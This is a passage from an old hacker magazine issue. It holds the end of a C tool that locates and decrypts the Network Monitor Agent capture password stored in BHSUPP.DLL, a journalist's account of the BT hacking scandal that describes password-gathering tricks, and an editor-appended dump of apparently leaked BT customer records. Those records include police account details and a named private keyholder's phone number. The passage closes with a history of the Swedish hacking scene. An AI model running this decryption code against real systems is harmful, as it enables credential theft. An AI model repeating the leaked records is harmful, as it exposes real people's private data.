  12760.     DecryptPassword(lpEncryptedPassword, lpszPlaintextPassword);
  12761.  
  12762.     //prepare for and print out results
  12763.     nCount2 = sprintf(lpszOutputBuffer, 
  12764.                       "\nThe Network Monitor Agent capture password is %s\n",
  12765.                       lpszPlaintextPassword);
  12766.  
  12767.     WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL);
  12768.  
  12769.     //close StandardIN and StandardOUT handles
  12770.     CloseHandle(g_hStdIn);
  12771.  
  12772.     CloseHandle(g_hStdOut);
  12773.  
  12774.     //exit with success
  12775.     ExitProcess(0L);
  12776. }
  12777.  
  12778.  
  12779. //Ah yeah, here it is.
  12780. void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword)
  12781. {
  12782.     register int outer, inner;
  12783.  
  12784.     //go backwards through loops to undo XOR
  12785.     for ( outer = 31; outer >= 0; outer-- )
  12786.     {
  12787.         for ( inner = 31; inner >= 0; inner-- )
  12788.         {
  12789.             if ( outer != inner )
  12790.             {
  12791.                 lpEncryptedPassword[inner] ^= lpEncryptedPassword[outer] + 
  12792.                                               (outer ^ inner) + inner;
  12793.             }
  12794.         }
  12795.     }
  12796.  
  12797.     //since the original password was folded to fill 32 bytes only copy the first 16 bytes
  12798.     memcpy(lpszPlaintextPassword, lpEncryptedPassword, 16);
  12799.  
  12800.     //zero terminate this baby just incase it is actually a 16 byte password (yeah, right!)
  12801.     lpszPlaintextPassword[16] = 0L;
  12802.  
  12803.     return;
  12804. }
  12805.  
  12806.  
  12807. //    get the path and file name for BHSUPP.DLL from the user in the case that it was
  12808. //  a custom install
  12809. void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile)
  12810. {
  12811.     char lpszPrompt[] = "\nFull path to BHSUPP.DLL including file name: ";
  12812.     UINT nCount;
  12813.  
  12814.     WriteFile(g_hStdOut, lpszPrompt, sizeof(lpszPrompt), &nCount, NULL);
  12815.  
  12816.     ReadFile(g_hStdIn, lpszTargetFile, MAX_PATH, &nCount, NULL);
  12817.  
  12818.     //I had to account for the CR + LF that ReadFile counts in the nCount return value,
  12819.     //so I can zero terminate this string.
  12820.     lpszTargetFile[nCount - 2] = 0L;
  12821.     
  12822.     *phTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | 
  12823.                              FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 
  12824.                              FILE_FLAG_SEQUENTIAL_SCAN, NULL);
  12825.  
  12826.     //too lazy to make the error message report the actual path and file name tried 
  12827.     if(*phTargetFile == INVALID_HANDLE_VALUE)
  12828.     {
  12829.         WriteFile(g_hStdOut, "Unable to open BHSUPP.DLL\n",
  12830.                   26, &nCount, NULL);
  12831.  
  12832.         ExitProcess(1L);
  12833.     }
  12834. }
  12835.  
  12836.  
  12837. //    This function allocs one big buffer and reads the whole damn DLL into it.
  12838. //    There is a flag string that marks the start of the section that contains the 
  12839. //    encrypted passwords (in the case that there is a display password too), so
  12840. //    we search for the first and last characters in the string.  If we hit on a match
  12841. //    we check about 50% of the chars in the string for a match.  This is a good
  12842. //    enough check based looking at the data.  I guess I could optimize memory usage 
  12843. //  here too, but 24K is not very much these days, so fuck it.
  12844. BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword)                   
  12845. {
  12846.     LPBYTE lpSearchBuffer;
  12847.     UINT nCount, i;
  12848.  
  12849.     //do the big buffer alloc
  12850.     lpSearchBuffer = malloc(MAX_FILE_SIZE);
  12851.  
  12852.     if(lpSearchBuffer == NULL)
  12853.     {
  12854.         WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
  12855.                   41, &nCount, NULL);
  12856.  
  12857.         ExitProcess(1L);
  12858.     }
  12859.  
  12860.     //read in the entire file.  It is small enough that this takes trivial time to complete.
  12861.     ReadFile(hTargetFile, lpSearchBuffer, MAX_FILE_SIZE, &nCount, NULL);
  12862.  
  12863.     //do search for RTSS&G--BEGIN--  When it is found move 48 bytes past the R and copy
  12864.     //the encrypted password into the workspace
  12865.     for(i=0; i<nCount; i++)
  12866.     {
  12867.         if(lpSearchBuffer[i] == 'R' && lpSearchBuffer[i+14] == '-')
  12868.         {
  12869.             if(lpSearchBuffer[i+1] == 'T' && lpSearchBuffer[i+2] == 'S' &&
  12870.                lpSearchBuffer[i+3] == 'S' && lpSearchBuffer[i+4] == '&' &&
  12871.                lpSearchBuffer[i+8] == 'B')
  12872.             {
  12873.                 //found password and coping it into the workspace
  12874.                 memcpy(lpEncryptedPassword, &lpSearchBuffer[i+48], 32);
  12875.                 
  12876.                 //cleanup the mem alloc
  12877.                 free(lpSearchBuffer);
  12878.  
  12879.                 //return with success
  12880.                 return TRUE;
  12881.             }
  12882.         }
  12883.     }
  12884.  
  12885.     //cleanup
  12886.     free(lpSearchBuffer);
  12887.     
  12888.     //it failed to find the marker string
  12889.     return FALSE;
  12890. }
  12891.  
  12892.                               ==Phrack Magazine==
  12893.  
  12894.                  Volume Seven, Issue Forty-Eight, File 16 of 18
  12895.  
  12896.  
  12897.              THE TRUTH, THE WHOLE TRUTH AND NOTHING BUT THE TRUTH-
  12898.                    -a story of the 'BT-Hacker' scandal.
  12899.  
  12900.                                By Steve Fleming
  12901.  
  12902.  
  12903. Sitting in a chilly university computer department in northern England
  12904. was in itself exhilarating.  The mid-February climate made it cold; my
  12905. head was buzzing with voices chatting freely about gaining access to
  12906. secret computers, acquiring free telephone calls and how to fashion
  12907. 'bombs' to maim or kill lecturers and 'Senior Vice Principles'.  There
  12908. was nobody else in the room, all the company was just under a meter from
  12909. me in CyberSpace, that alternative universe where anything is possible
  12910. and everyone is somebody they want to be.  The stories were
  12911. extraordinary - in fact they were incredible, an eclectic mix of fact
  12912. and fantasy bound together by expert social engineering.
  12913.  
  12914. These CyberSpace 'cafes' are the BBS' - Bulletin Board Services - and
  12915. are the stock-in-trade of the electronic community.  The Internet is
  12916. connected to some of them, but the best ones, the ones with the best
  12917. chat and the most exciting files are not - you get the dial-in number
  12918. from another user, and have to then beg to use the service.  It is
  12919. interesting to note that the Internet has now become a generic term for
  12920. on-line communication and suffers as a result of its inappropriate use.
  12921. Blaming the Internet for anything is like apportioning culpability to
  12922. 'society' - fine for academics but otherwise a shallow construct.
  12923.  
  12924. I have known some computer experts in my time, and still some 'reformed
  12925. hackers' count as my best friends - I really wanted to find out if a
  12926. major British computer could be hacked or if it had been done.  The UK
  12927. has some of the most draconian secrecy laws anywhere on the planet, so
  12928. if secrets are found, they tend to be kept secret.  When people start
  12929. talking in CyberSpace, they really talk and talk and talk.  Their voice
  12930. has no tone or volume, no emotion or mood - it can be like talking with
  12931. a form of electronic psychopath sometimes.  But there are inventive
  12932. ideas 'on-line', and sometimes you can SHOUT, but this is quite rude,
  12933. mostly pictorial punctuation (the smiley) is the key.  You can indicate
  12934. a smile :-)  or a frown {:-(  and you can even indicate sarcasm ;-) with
  12935. a sly wink.  It's interesting to note that irony is not really a north
  12936. American thing at all;  sarcasm is a CyberSpace thing. I wouldn't say
  12937. that I am an expert, I wouldn't even say that I was very good with
  12938. computers, I'm always learning.  My qualifications are in science;
  12939. Biology and Psychology, not computing.  What this gives me is an urge to
  12940. investigate assuming a null hypothesis - I disprove things in short.
  12941. It's funny to think that most of the press followed a placed PR line
  12942. that I must be a '... twisted computer boffin who had broken into an
  12943. '...entirely robust...' computer system'.  And my, did that title stick
  12944. - friends from Hong Kong to Turkey called to say I was a computer expert
  12945. all over the world!  This was very effective and obviously placed by
  12946. someone with powerful influence, perhaps advertising influence?  It
  12947. doesn't really matter, bad journalism is all over and we all have a
  12948. living to earn - I however, would never do it at the expense of a
  12949. colleague.
  12950.  
  12951. There was the vision of news editors screaming, "... get me some
  12952. secrets!" - they simply couldn't believe that a freelance with only a
  12953. few published pieces could have brought in such an impressive story with
  12954. a scandal at every level - so they capitulated with the 'boffin' lie and
  12955. went back to boring, standard, sloppy 'background' on this 'hacker'.  It
  12956. was actually a bit of a personal tragedy, my on-line persona was
  12957. cracked, there wasn't very much in my life at all, quite a boring person
  12958. really; like most journalists who spend a lot of time observing rather
  12959. than doing.  The Today newspaper had some hot tip-off's from people I'd
  12960. interviewed in the past, one man in particular who had lied in a silky
  12961. and attractive way for two and a half hours had been doing the same to
  12962. them.  The fact that I wrote for a 'gay magazine'.  Shock horror, a
  12963. definite Philby, Burgess & McLean story breaking.  What a bit of
  12964. investigate journalism that wasn't, I wrote under my own name!  Was he a
  12965. spy, was he working for Libya, Israel, MI-6, MI-5, the Labour Party,
  12966. Duncan Campbell, Richard Gott... and then there was the 'shit-bagging'.
  12967. This happens when tardy investigators are ignorant of the facts,
  12968. automatically they assume it should be them who had the story, if only
  12969. they'd had the time.  But this is all history now, and I forgive them
  12970. all... but I never forget.
  12971.  
  12972. How could a temporary member of staff see all this secret information?
  12973. The list forming in the mind of the press (and I do think in situations
  12974. like these one surprisingly tiny mind) went something like this:
  12975.  
  12976. 1.    They aren't secrets at all.
  12977.  
  12978. 2.      BT would know if anyone had looked at the secret stuff, so
  12979.         they'll catch the whistle-blower; probably working for computer
  12980.         security within BT.
  12981.  
  12982. 3.      Fleming is a computer expert, he's hacked the system and is
  12983.         spinning a story to prevent him being found out - and he's not a
  12984.         'real' journalist and we are.
  12985.  
  12986. Well, there was clear evidence that the stuff was very sensitive, so
  12987. strike number 1 from the list.  How could they wait for stage two, if it
  12988. is the case it may take days or weeks, so they couldn't have that -
  12989. anyway the Independent had shown it could be done away in time or place
  12990. of Fleming.  The only option was;  who's there, who'll talk, and how can
  12991. we retain credibility as journalists - repudiate the freelance!
  12992.  
  12993. There was no shortage of shit-bag material; 'various anonymous
  12994. sources... unconfirmed reports... it seems likely etc.'  Some even
  12995. fancied the idea that the details were shocking, but lets just do it all
  12996. ourselves and dump on Fleming from a great height?  It really was like
  12997. being on a maggot farm, wading through pen after pen of repulsive,
  12998. brainless, panicked... maggots.
  12999.  
  13000. The truth is that there was no great skill involved in cracking BT's
  13001. computer, it was so easy my pet parrot could have done it with only one
  13002. claw.  Many companies are confused about computer security and what it
  13003. means.  The sharp young suits talk about 'magneto-optical storage
  13004. facilities' and 'EPROM or WORM access'.  The captains of industry nod
  13005. sagely, they run the ship and leave the deck scrubbing to junior
  13006. officers.  These proud, self important and generally thick as two short
  13007. planks when it comes to computers men, authorise huge budgets for the
  13008. whiz-kids who play with the money, buy new things, install new software,
  13009. 'patch' the operating system, attach ISDN cards, issue user ID's after
  13010. extensive family checks.  You name it, and these guys do it, and they
  13011. love it.  They install password checkers that look for hackers (or
  13012. errors) and disconnect users for 15 minutes if they get their passwords
  13013. wrong three times.  The captains of industry still discuss 'wireless'
  13014. and 'word processors'.  The bright young men should be allowed to deal
  13015. with all the computer stuff, it's not that the captains can't understand
  13016. it or anything like that, they just don't have the time.
  13017.  
  13018. Staff who have to work the systems couldn't care less about the
  13019. 'advanced software engineering' that went into the system.  There is as
  13020. much 'social engineering' as any other sort when it comes to computers
  13021. for industry.  So they have to remember passwords that change regularly
  13022. and they have to remember to get that report done, and see the boss and
  13023. train the new staff and type that letter and claim those expenses and
  13024. design that form and... it's a lot to remember.  When folk have a lot to
  13025. remember they make lists, and those lists include passwords - sounds
  13026. like an opportunuty for 'trashing'.  They simply look through the
  13027. rubbish and see what they can see.  Sometimes someone writes down a
  13028. password on a post-it note to let someone into their computer for some
  13029. reason, that person enters the password and makes a note in their diary
  13030. of it and pops  the sticky in the bin.  Then, in these busy offices,
  13031. staffing levels are being cut.  The  managers need a dozen staff, and
  13032. have four.  They are allowed to contract from a temp agency and top up
  13033. the office. These people are often unemployed graduates.  Clever, but
  13034. very, very bored.  They don't get paid much, £4.00 an hour.  That's what
  13035. I was paid to write a nationwide database suite for BT but there I have
  13036. to stop, the gag is cutting into me.  They just want a decent job, and
  13037. try to impress in case they get offered one, and the companies play on
  13038. this and exploit without mercy.  £4.00 an hour and they want unbridled
  13039. enthusiasm, ideas, loyalty, commitment - who are they trying to kid!
  13040.  
  13041. The computer administrators say they can't give temporary access to the
  13042. system, '... it can't be done.'  Well what do you suggest?  'You'll just
  13043. have to make do, it's the system, can't help, sorry.'  You need a dozen
  13044. workers, perhaps 6 need to be on the system, you have 5 passwords plus
  13045. another of the departmental manager making six.  Why not let the temps
  13046. use these passwords and you can get on with the more important stuff,
  13047. can't be any harm in that?  It's not as if we're using them?  However,
  13048. temps are just that, temporary - they move on.  Consequently with all
  13049. the changes you make up a folder with all the passwords and then they
  13050. can just flick through that to find a password, it doesn't seem all that
  13051. insecure does it?
  13052.  
  13053. And there we have it, passwords being shared, passed, written down,
  13054. typed in and shouted across the office.  You can forget about any notion
  13055. of security, the moment you take that step the whole system is
  13056. pointless, you may as well print out all the secret information and sell
  13057. it in Dillons - it would certainly make the phone book a best seller!
  13058. Better still if the marketer's got what they wanted, put it on CD-ROM
  13059. and charge a fortune for it at christmas;
  13060.  
  13061. The Multimedia Secrets Collection, £199.95!  
  13062.  
  13063. The ideal christmas gift for the spy in your life.  Includes music from
  13064. around the world.  BT, it's good to talk!  NB it may be an offence to
  13065. talk to anybody about this.
  13066.  
  13067. Now you see why BT are keen to quell this espial, they know the
  13068. situation, but don't want it publicised, it's very embarrassing for
  13069. goodness sake - they have a contract to advise the government on
  13070. computer security!  Frankly, I couldn't care less if some BT mandarin
  13071. gets a red face, it is no concern of mine.  What is, is the fact that
  13072. these secrets are not encrypted and are broadcast around the country on
  13073. computers and are available to just about anyone who cares to look at
  13074. it.  The only warning displayed was 'Unauthorised access is an offence
  13075. under the Computer Misuse Act (1990)' - but this access isn't
  13076. unauthorised, is it?  This notion of 'confidential' is a joke.  BT's
  13077. computers happily broadcast your ex-directory telephone number (and soon
  13078. your name) down the line unless you make the choice to prevent it.  What
  13079. is confidential about that?  The public interest is of prime importance
  13080. here.  The scandalous intimition in my legal gag is that I am risking
  13081. national security?  Me!  Well I have a lot to say about that, it's not
  13082. me that allows any old temp to see secrets, and I have never printed a
  13083. single telephone number or details of any equipment, unlike some
  13084. respected others.  I brought the fact this could be done to light in a
  13085. responsible journalistic manner.
  13086.  
  13087. If I was such an expert, the intelligence service would have snapped me
  13088. up immediately, BT would have paid me off and the government could have
  13089. avoided embarrassment.  But I'm not, I'm a journalist.  The Independent
  13090. published this story and I have respect for them, they took a risk and
  13091. then wanted to distance themselves from me, which I understand.  It was
  13092. however a lonely, cold and frightening experience which is not yet over.
  13093.  
  13094. The governments of these lands talk big about how the information
  13095. superhighway will change all our lives, and how committed they are to
  13096. servicing this new form of infrastructure leading to a new, fresh and
  13097. exciting dimension - but they also punish, abuse, prosecute, imprison
  13098. and destroy the lives of the people who may be far better able to
  13099. exploit their ignorance and expose the sensitive underbelly of their
  13100. power - their information.  If you ask me, the old guys will make
  13101. CyberSpace just as ugly and corrupt as the society they have already
  13102. spawned, nurtured and set on a path of destruction out here.  I for one
  13103. don't want or need their advice, support or money - let them lay in the
  13104. bed they have made, I'll stay in CyberSpace.
  13105.  
  13106. ------------------------------------------------------------------------------
  13107.  
  13108.                      - Related Info Appended by the Editor -
  13109.  
  13110.  
  13111.                            DCS    DISPLAY CUSTOMER SUMMARY       ??/??/?? 11:41
  13112.  
  13113. Name   : THE CHIEF CONSTABLE                 Telephone No : 031-315 2007   NQR
  13114.                                              Account No   : 8077 0366
  13115. Address: LOTHIAN & BORDERS POLICE            Customer Type: BUSINESS VOLUME
  13116.          POLICE HEADQUARTERS                 Installations:  1
  13117.          5 FETTES AVE
  13118.          EDINBURGH                           LINE DETAILS
  13119.          EH4  1RB                            Installed    : 26/08/88
  13120.                                              Line Status  : B/W
  13121.                                              Curr State   :
  13122.                                              Inst Class'n : BUS SINGLE EXCL
  13123.                     ORDER                    Exchange Type: TXDX03
  13124. RECEPTION MARKER    Recent Order : YES
  13125.                     Contr Signed :           BILLING
  13126. REPAIR              CONSENT                  Method of Pay: ORDINARY ACCOUNT
  13127.              : NO   Systems Bus  : C         A/C U/Enquiry: NO
  13128. Servicecare  : NO   Sup Serv Bus : D         D/M Case     : NO
  13129. O/S fault    : NO                            Cust Options : STANDARD VRUF
  13130. Hist fault   : NO                            OSC Ind      : NO
  13131. Hazard       :                               CUSTOMER CONTACTS
  13132. Warning      :                               Issue        : NO     Notes : YES
  13133.  
  13134.  BRDCST MANAGERS USING NJR-PLEASE DNB"NJRNEWS" FOR UPDATE ON CALLOUT PROBLEM ES
  13135. 4A_                                                       O-O
  13136.                            DCRD   PRODUCT TARIFF DETAILS         ??/??/?? 11:41
  13137.  
  13138.  Exchange Name : DEAN                              Tel No : 031-315 2007  NQR
  13139.  Installed     : 26/08/88                          a/c No : 8077 0366
  13140.  Inst Class'n  : BUS SINGLE EXCL     Notes : YES   S/S No :
  13141.  
  13142.  QTY   PROD ID    SHORT DESC or MSC / CP NOTE       TARIFF:RATE         TOTAL
  13143.  
  13144.     1  A14499  C  EXCH LINE + LINEBOX                       32.66         32.66
  13145.        *
  13146.     1  A10117  C  BASIC DIAL PHONE                           4.70          4.70
  13147.        *
  13148.     1  A12481  C  PRIVACY SET NO 8                          51.75         51.75
  13149.        *
  13150.  
  13151.  
  13152.                                              TARIFF GRAND TOTAL :         89.11
  13153.                                                                              ES
  13154. 4A_                                                       O-O
  13155.                            DIN    DISPLAY NOTE DETAILS           ??/??/?? 11:41
  13156.  
  13157.  Installation : THE CHIEF CONSTABLE            Tel no :  031-315 2007     NQR
  13158.  Name
  13159.  
  13160.              WRITTEN    <         AUTHOR           >    EXPIRES
  13161.  
  13162.               8/ 2/94   JOSEPHINE/8813                  8/ 2/95
  13163.  
  13164.              A/.D LTR SENT FOR 0506843235,0313322106
  13165.              0506881101 AND 0313152007
  13166.                            
  13167.                            
  13168.                            
  13169.                            
  13170.                            DCS    DISPLAY CUSTOMER SUMMARY       ??/??/?? 11:43
  13171.  
  13172. Name   : LOTHIAN & BORDERS POLICE            Telephone No : 031-332 2106   NQR
  13173.                                              Account No   : 8076 9640
  13174. Address: POLICE HEADQUARTERS                 Customer Type: PAYPHONE BUS
  13175.          5 FETTES AVE                        Installations:  1
  13176.          EDINBURGH
  13177.          EH4  1RB                            LINE DETAILS
  13178.                                              Installed    : 04/10/83
  13179.                                              Line Status  : B/W
  13180.                                              Curr State   :
  13181.                                              Inst Class'n : BUS PAYPHONE
  13182.                     ORDER                    Exchange Type: TXDX03
  13183. RECEPTION MARKER    Recent Order : NO
  13184.  BMC/C/N/ / /       Contr Signed : YES       BILLING
  13185. REPAIR              CONSENT                  Method of Pay: ORDINARY ACCOUNT
  13186.              : **   Systems Bus  : D         A/C U/Enquiry: NO
  13187. Servicecare  : S    Sup Serv Bus : C         D/M Case     : NO
  13188. O/S fault    : NO                            Cust Options : SINGLE LINE OPTION
  13189. Hist fault   : NO                            OSC Ind      : NO
  13190. Hazard       :                               CUSTOMER CONTACTS
  13191. Warning      :                               Issue        : COM    Notes : YES
  13192.  
  13193.                                                                              ES
  13194. 4A_                                                       O-O
  13195.                            DCRD   PRODUCT TARIFF DETAILS         ??/??/?? 11:43
  13196.  
  13197.  Exchange Name : DEAN                              Tel No : 031-332 2106  NQR
  13198.  Installed     : 04/10/83                          a/c No : 8076 9640
  13199.  Inst Class'n  : BUS PAYPHONE        Notes : YES   S/S No :
  13200.  
  13201.  QTY   PROD ID    SHORT DESC or MSC / CP NOTE       TARIFF:RATE         TOTAL
  13202.  
  13203.     1  A17867  C  PAYP LINE SKTD SGL LINE TG10              32.66         32.66
  13204.        *
  13205.     1  A19493  C  OPTION 50 NON-ISDN SITE LINE               0.00          0.00
  13206.        *
  13207.     1  A11790  C  INTERNAL EXTN OFF MASTER SCKT              0.00          0.00
  13208.        *
  13209.     1  A17817  O  MINSTREL PLUS PHONE                    Outright    sale
  13210.        FREE GIFT - NO GUARANTEE
  13211.     1  A11810  C  METER PULSE FACILITY                       6.70          6.70
  13212.        *
  13213.     1  A19398  C  PAYPHONE 190MP TABLE-TOP MODEL         Outright    sale
  13214.        KEYHOLDER BETTY MITCHELL ON 031.311.3338
  13215.     1             Standard Care charge on A19398            12.00         12.00
  13216.        *
  13217.                                              TARIFF GRAND TOTAL :         51.36
  13218.                                                                              ES
  13219. 4A_                                                       O-O
  13220.                            DIN    DISPLAY NOTE DETAILS           ??/??/?? 11:43
  13221.  
  13222.  Installation : LOTHIAN & BORDERS POLICE       Tel no :  031-332 2106     NQR
  13223.  Name
  13224.  
  13225.              WRITTEN    <         AUTHOR           >    EXPIRES
  13226.  
  13227.               8/ 2/94   JOSEPHINE/8813                  8/ 2/95
  13228.  
  13229.              A/.D LTR SENT FOR 0506843235,0313322106
  13230.              0506881101 AND 0313152007
  13231.  
  13232.  
  13233.                               ==Phrack Magazine==
  13234.  
  13235.                  Volume Seven, Issue Forty-Eight, File 17 of 18
  13236.  
  13237. ****************************************************************************
  13238.  
  13239.                              International Scenes
  13240.  
  13241. There was once a time when hackers were basically isolated.  It was
  13242. almost unheard of to run into hackers from countries other than the
  13243. United States.  Then in the mid 1980's thanks largely to the existence
  13244. of chat systems accessible through X.25 networks like Altger, tchh and
  13245. QSD, hackers world-wide began to run into each other. They began to
  13246. talk, trade information, and learn from each other. Separate and diverse
  13247. subcultures began to merge into one collective scene and has brought us
  13248. the hacking subculture we know today.  A subculture that knows no
  13249. borders, one whose denizens share the common goal of liberating
  13250. information from its corporate shackles.
  13251.  
  13252. With the incredible proliferation of the Internet around the globe, this
  13253. group is growing by leaps and bounds.  With this in mind, we want to
  13254. help further unite the communities in various countries by shedding
  13255. light onto the hacking scenes that exist there.  If you want to
  13256. contribute a file about the hacking scene in your country, please send
  13257. it to us at phrack@well.com.
  13258.  
  13259. This issue we have files about the scenes in Sweden and Brazil.
  13260.  
  13261. ------------------------------------------------------------------------------
  13262.  
  13263. The Swedish Hacker Scene
  13264.  
  13265. It's about time to fill up this hole in the worldwide history of hackers
  13266. published in the Phrack series of articles on national scenes. Since no
  13267. one else seems to be getting around to do it I'd better do it myself.
  13268.  
  13269. Sweden was in fact one of the countries in the front line during the
  13270. birth of computers in the 1940's and 50's. By 1953 KTH university in
  13271. Stockholm built BESK, at the time being the fastest and most advanced
  13272. computer in the world. During the late 1960's Linkoping university
  13273. specialized in computer science and in 1973 the computer society Lysator
  13274. started out as an offshoot of american hacker culture of the kind you
  13275. could find at MIT during the 60's and 70's. They are still active and
  13276. often referred to as the first Swedish hacker society ever, which is
  13277. indeed true. Now days they still adhere to the international hacker
  13278. ethic of university societies and among their lines are as well idiots
  13279. as real bright guys (as is the case of most such societies) and their
  13280. contributions to the world of e-culture include Project Runeberg; a text
  13281. archive of Scandinavian literature, and a voluminous FTP archive.
  13282. There's actually a lot of ASCII work being done at Lysator, including
  13283. converting Phrack back issues to HTML format.
  13284.  
  13285. Despite the early interest in computers in Sweden there was no
  13286. equivalent to the American phreakers of the 1970's. This was not caused
  13287. by lack of knowledge but rather by dullness. Sweden was during the 70's
  13288. and early 80's in a period of both economic wealth and social mentality
  13289. commonly known as "The Welfare State". Everybody was facing the same
  13290. high economic standards, nobody was really displeased with Swedish
  13291. society, and the government granted lots of spare-time activities for
  13292. youths. Thus the growing ground for any outlaw societies was withdrawn.
  13293. (Eg Hells Angels didn't start out in Sweden until the 80's.) Swedes were
  13294. in fact too pleased, too wealthy and too filled up with their vision of
  13295. an almost utopian society to even get the faintest glimpse of an idea to
  13296. form any underground movements. Even political groupings like
  13297. Anarchists, Hippies (in Europe referred to as "Provos") or Fascists were
  13298. almost WIPED OUT by the extreme political climate and wealth of the
  13299. 70's.
  13300.  
  13301. Thus, phreaker culture couldn't possibly start out in Sweden at this
  13302. time, though some freaked out engineers and radio-amateurs might have
  13303. built blue boxes and similar equipment for their household needs. This
  13304. state of society caused Sweden to lag behind other European and
  13305. Scandinavian countries in the field of outlaw hacking.
  13306.  
  13307. The first hacker activity in Sweden was reported by the authorities in
  13308. 1980. The hacker in question was a student at Chalmers university in
  13309. Gothenburg and was sued for manipulating the account system into
  13310. granting him free access to the mainframe, for which was sentenced to a
  13311. relatively light fine. Apart from some similar incidents carried out by
  13312. bright individuals there was no real H/P scene until 1984. Also in 1980
  13313. BBS activity started out in Sweden. Most enthusiasts were using a
  13314. Swedish micro built by Luxor and DIAB in 1978 called ABC-80 (Obviously
  13315. inspired by the American TRS-80). These enthusiast, however, were well
  13316. organized engineers running a straight user-group, no anarchists or
  13317. radicals of any kind were ever involved.
  13318.  
  13319. In 1984 a magazine called "Rolig Teknik" started out as an offshoot of
  13320. YIPL/TAP featuring the same kind of material, and by 1987 some
  13321. journalist "discovered" this magazine, causing a lot of noise throughout
  13322. The Welfare State and bringing people out in a public debate of how to
  13323. defeat this magazine. (Though it actually didn't feature any illegal
  13324. material; even Sweden has the freedom of speech and press written
  13325. explicit in its constitution, as in the American First Amendment.)
  13326. "Rolig Teknik" rapidly became a cult media for underground electronic
  13327. freaks, outlaw radio amateurs, and other antisocial movements. But let's
  13328. not get ahead of events.
  13329.  
  13330. By early 1984 two youths aged 17 and 19, clearly inspired by the movie
  13331. "War Games", hacked their way into several Swedish computer systems
  13332. using a simple Apple II and a 300 baud modem, notably DAFA-Spar - a
  13333. register containing public information on every Swedish citizen. Though
  13334. there were no secret data in this computer, and though these hackers
  13335. never succeed in gaining root access, the incident was annoying to the
  13336. authorities. Also this year, some wealthy upper-middle class youths
  13337. started using the was-to-become major European home computer: the
  13338. Commodore 64. What the Apple II was for America, the C-64 was for
  13339. Europe. Enter the software crackers.
  13340.  
  13341. C-64 was THE symbol of hackerdom to Swedish youths in the 1980's. As
  13342. software cracker Mr.Z pioneered the hacker scene in 1983 with hundreds
  13343. and hundreds of cracked games, Swedish hackers somehow got to believe
  13344. that cracking games was the Big Thing for any hacker. Besides, not many
  13345. of these guys had modems. By 1987 American game producers were alarmed
  13346. by the Niagara of cracked C-64 software being downloaded from Europe,
  13347. causing them to start copy-protecting games that were to be exported to
  13348. Europe. A closer examination showed that a lot of these cracks were made
  13349. by Swedish groups, notably Triad and Fairlight. Thus, most Americans to
  13350. get in touch with the Swedish hacker scene were what you would refer to
  13351. as the "Warez D00ds" or "Pirates" of the time. Since the Swedes were
  13352. unable to phreak due to lack of knowledge in the telecom field, American
  13353. warez d00ds constantly called up Swedish crackers to obtain the latest
  13354. software.
  13355.  
  13356. There seems to be some kind of misconception in the American view of the
  13357. hacker culture of Europe: Not very many hackers in Sweden and the rest
  13358. of Europe got into phreaking nor net hacking in these early years,
  13359. perhaps with the exception of the movement in Germany caused by Chaos
  13360. Computer Club. By tradition most European hackers in general, and
  13361. Swedish hackers in particular, turned to software cracking and demo
  13362. programming. (The Demo as an art form was invented in Europe during
  13363. 1984-86.) None of these activities were actually illegal at the time
  13364. being, though indeed underground. This might have helped to create the
  13365. general American view of European hackers as "Idiotic Immature Warez
  13366. D00ds". In fact, most European hackers look upon software cracking and
  13367. demo programming with pride, though spreading (warez trading) wasn't
  13368. considered a real hacker activity, and pirating for economic gain was
  13369. looked upon with disgust and utter contempt. Software spreading in all
  13370. forms was finally outlawed in Sweden January 1st 1993.
  13371.  
  13372. 1986: Enter the Netrunners.
  13373. By the year 1986 the legendary BBS "Tungelstamonitorn" under the
  13374. supervision of Jinge Flucht began distributing H/P and Anarchy files.
  13375. Jinge himself, being a social inspector and thereby fully aware of the
  13376. state of society, was upset with The Welfare State and thought the
  13377. Swedes had gone law-abiding in an absurd and unhealthy manner. In his
  13378. view people seemed to accept laws without ever questioning them, thereby
  13379. making Sweden into a conformistic utopian hell. Later Jinge joined the
  13380. Fidonet where he got known for running the most explicit and intense
  13381. debates in Swedish BBS-culture ever.
  13382.  
  13383. Probably the H/P files stored at Jinges BBS were the spark that lit the
  13384. Swedish net hacking scene. Swedish hackers had SEEN "War Games", HEARD
  13385. about the CCC in Germany, and now they finally got their hands on
  13386. documents that explained the techniques. In 1987 excerpts from Steven
  13387. Levy's "Hackers" and Bill Leebs "Out of the Inner Circle" were reprinted
  13388. in the Swedish computer- magazine "Datormagazin" by editor Christer
  13389. Rindeblad, creating a common group-awareness among Swedish hackers.
  13390. ("Out of the Inner Circle" had actually been translated to Swedish
  13391. already 1985, but was obviously read mostly by security experts and War
  13392. Games-obsessed wannabe's.) 1987 also saw the birth of the first
  13393. all-Swedish hacker group ever to make themselves a name outside
  13394. Scandinavia. This was of course SHA - Swedish Hackers Association.
  13395.  
  13396. SHA wanted to be a hacker group of international standards and
  13397. qualities. They collected the best people, storing up a knowledge basis
  13398. for future use. In the years 1989-92 SHA was at its height, successfully
  13399. trashing computer companies and computer scrap dumps and gaining access
  13400. to hundreds of computers. Inspired by the German hackers Pengo and
  13401. Hagbard in Leitstelle 511 they started having regular meetings on
  13402. fridays at their own booked table in a restaurant in Stockholm. Their
  13403. perhaps biggest achievement ever was made in 1991 when they wrote a
  13404. scanner to exploit the Unix NIS-bug, running it on 30 processes
  13405. simultaneously, and ending up with some 150.000 passwords whereof 600
  13406. gained root access. Though some would say SHA were a bit too fond of the
  13407. media image of hackers and sometimes had a weakness for hacker cliches,
  13408. no one can really deny their achievements.
  13409.  
  13410. Swedish hackers also got a lot attention for their carding activities in
  13411. 1989. Both Sneaker of SHA and Erik XIV of Agile wrote modulo
  13412. 10-calculators to produce endless series of valid Visa-numbers. Erik XIV
  13413. was even on national television, demonstrating the weaknesses of the
  13414. credit card system. Cynically they were both busted.
  13415.  
  13416. At Christmas 1990 the Swedish X.25 network Datapak and Decnet were both
  13417. attacked by a group of UK hackers called 8LGM (8 Little Green Men or
  13418. 8-Legged Groove Machine - I don't know which one is a media nick). Using
  13419. a war dialer they scanned about 22.000 entries and successfully accessed
  13420. 380 of these. This is perhaps the most well-known of all hacks in
  13421. Sweden, causing a lot of media noise. (The exact figures are a product
